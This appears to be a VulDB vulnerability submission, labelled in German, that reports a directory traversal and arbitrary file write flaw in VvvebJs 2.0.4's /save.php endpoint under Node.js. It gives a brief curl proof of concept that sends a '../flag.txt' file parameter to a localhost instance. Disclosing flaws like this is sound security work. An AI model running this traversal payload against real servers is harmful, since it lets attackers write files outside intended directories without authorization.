| Titel | givanz Vvvebjs 2.0.4 Directory Traversal (Arbitrary File Write) |
|---|
| Beschreibung | VvvebJs suffers from a directory traversal vulnerability in the /save.php endpoint. The issue allows remote attackers to write arbitrary files outside the intended directory via the file POST parameter due to insufficient sanitization of user input.
This vulnerability exists only when the application is run using Node.js, following the project documentation (node save.js).
POC:
# Start the application with:
node save.js
# Send the malicious request:
curl -X POST http://localhost:8080/save.php \
-d 'file=../flag.txt&html=exploit'
This will create a file named flag.txt one level above the server root, demonstrating path traversal and arbitrary file write.
|
|---|
| Quelle | ⚠️ https://github.com/givanz/VvvebJs/issues/409 |
|---|
| Benutzer | Enigma522 (UID 88000) |
|---|
| Einreichung | 16.07.2025 13:26 (vor 9 Monaten) |
|---|
| Moderieren | 04.08.2025 08:27 (19 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 318648 [givanz Vvvebjs bis 2.0.4 node.js /save.php Datei Directory Traversal] |
|---|
| Punkte | 20 |
|---|